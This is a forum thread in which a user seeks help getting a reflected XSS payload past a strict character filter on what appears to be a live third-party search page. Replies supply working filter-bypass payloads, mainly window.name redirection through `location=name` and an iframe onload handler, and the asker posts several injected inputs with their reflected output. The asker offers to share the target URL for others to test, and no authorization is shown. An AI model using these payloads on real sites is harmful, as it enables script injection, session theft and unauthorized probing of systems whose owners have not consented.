I am having trouble getting around a restrictive XSS filter (also being limited to exactly 70 characters)

The filter removes any /,",',(,),!

What goes through is <,>,=,: and normal alphanumeric characters and numbers.

Anyone got an idea what i could do? Not having brackets/slashes is probably the biggest issue here.

What are you injecting into?

If your injecting into an attribute that needs a delimiter to close it, you may be out of luck. But, if you can use > to close the current tag, or you are not inside a tag, you could use whatever you want really.

Can you give an example of your input and output?

The input from a get parameter is being reflected in the HTML code. I am in the middle of html tags..

I can inject basic html tags, attributes (without any type of quote) but i cannot inject any slashes.

<script>alert('1:=!')</script>

becomes

<script>alert1:=<script>

I am losing all brackets, double-quotes, single quotes, exclamation marks, etc.

I forgot to mention, i also don't have the brackets [] ....
It's as if they read
http://sla.ckers.org/forum/read.php?24,32930

location=name

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Sorry, i manage to do the basic XSS stuff, but i never got that location/window.name stuff. Maybe you got a link where it's explained a little further?

How would i avoid the script error because of the missing ability to close an opening <script> block?

<script>location=name</script>

becomes

<script>location=name<script>

I can also not use html comments or javascript comments to ignore the html stuff that follows.....

<h1 id="xy">
foo bar XXXXXXXXXXXXXXXX&ldquo;
</h1>

I can inject at XXXXXXXXXXX.

Whitelist:
a-Z 0-9
- < > . : =

Updated: forgot the "=" char is allowed, too.



Edited 1 time(s). Last edit at 02/27/2012 01:34PM by asrail.

<iframe src="//victim/vuln.php?injection=%3Cscript%3Elocation%3Dname%3B%3C%2Fscript%3E" name="javascript:alert(1)"></iframe>

Whitespace?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Thanks, understood the location=name now - very nice.
Whitespace is going through and commas too.

The main issue left is how to prevent the script error in this:

<script>location=name&ldquo;
</h1>

maybe it's possible to use the "&" and the ";" somehow... but i got no idea so far.

WHITELIST updated:

a-Z 0-9
- < > . : = , @ (blank spaces)

This thing is really weird, because i need to trigger a searchresult, and some queries do not return a search result, so they don't get reflected (only in search result page is the reflection).
--------------
xxx?search=%3Cscript%3Elocation=name,1=1-;

this echoes

<script>location=name,1=1-;&ldquo;
</h1>

but "Uncaught SyntaxError: Unexpected token ;"...

--------------

xxx?search=<script>location=name,1=5;

becomes

<script>location=name,1=5;&ldquo;

--------------

xxx?search=<style>@\import "data:,*{x:expression(write(1))}";

becomes
<style>@import data:,{x:expressionwrite1};&ldquo;
</h1>



Edited 2 time(s). Last edit at 02/28/2012 01:54PM by asrail.

As you can see in some cases the brackets {} do work and aren't filtered... It's like there is some sort of randomizer

i manage to insert a link like this:
xxx?search=<a href='feed:data:x,123456'>Click</a>

yields

<a href=feed:data:x,123456>click<a>&ldquo;
<h1>

But can't link to anything outside, because no "/"...

I started some random testing with strings, and some go through for whatever reason, like this one:

search=<script>var%20reload_product_tiles={_vBox:{left:0,width:9999},_url:"",_init:function%28%29{

becomes

<script>var reload_product_tiles={_vbox:{left:0,width:9999},_url:,_...&ldquo;

@Gareth i could provide you with the url to test if this possibly sparked your interest :-)



Edited 2 time(s). Last edit at 02/28/2012 02:04PM by asrail.

So if whitespace is allowed then iframe allows you to execute js.

<iframe onload=location=window.name>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Thank you Gareth, that was awesome. I didn't think of an iframe that loads nothing and instantly triggers the onload... had to add that to my repertoire :-)

Will hopefully aquire a new customer this way. You earned yourself a beer!